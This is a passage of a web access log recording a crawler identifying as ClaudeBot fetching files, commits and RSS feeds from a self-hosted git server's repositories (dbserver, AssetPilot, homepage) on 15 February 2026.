[Client 216.73.216.188] [Length 1546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json?display=rendered" [Client 216.73.216.188] [Length 11190] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15950] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=rendered" [Client 216.73.216.188] [Length 11177] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 216.73.216.188] [Length 10130] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 216.73.216.188] [Length 10057] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/vite.config.ts" [Client 216.73.216.188] [Length 11890] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css/style.css?display=source" [Client 216.73.216.188] [Length 31568] [Gzip 9.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 216.73.216.188] [Length 12744] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 216.73.216.188] [Length 11248] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/services/geminiService.ts" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 10097] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 9823] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js?display=source" [Client 216.73.216.188] [Length 27687] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=source" [Client 216.73.216.188] [Length 12259] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 9865] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 9952] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 216.73.216.188] [Length 1014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 15089] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" [Client 216.73.216.188] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" [Client 216.73.216.188] [Length 10603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Fdatabase.sqlite" [Client 216.73.216.188] [Length 18354] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15548] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" [Client 216.73.216.188] [Length 10081] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 10264] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 216.73.216.188] [Length 11223] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt?display=rendered" [Client 216.73.216.188] [Length 10943] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/css/style.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 1937] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json?display=rendered" [Client 216.73.216.188] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10832] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/keys.json" [Client 216.73.216.188] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html?display=rendered" [Client 216.73.216.188] [Length 10977] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 11134] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 216.73.216.188] [Length 14807] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host" [Client 216.73.216.188] [Length 10058] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/fetcher.py" [Client 216.73.216.188] [Length 8207] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js?display=rendered" [Client 216.73.216.188] [Length 11203] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 216.73.216.188] [Length 11103] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/assets/js/script.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json?display=source" [Client 216.73.216.188] [Length 13021] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService" [Client 216.73.216.188] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 216.73.216.188] [Length 11455] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 216.73.216.188] [Length 11608] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" [Client 216.73.216.188] [Length 10090] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" [Client 216.73.216.188] [Length 10305] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 216.73.216.188] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/services/geminiService.ts" [Client 216.73.216.188] [Length 836] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=rendered" [Client 216.73.216.188] [Length 11195] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html" [Client 216.73.216.188] [Length 9823] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py?display=source" [Client 216.73.216.188] [Length 19655] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 13208] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10959] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 216.73.216.188] [Length 10899] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 1541] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 216.73.216.188] [Length 10068] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0" [Client 216.73.216.188] [Length 25373] 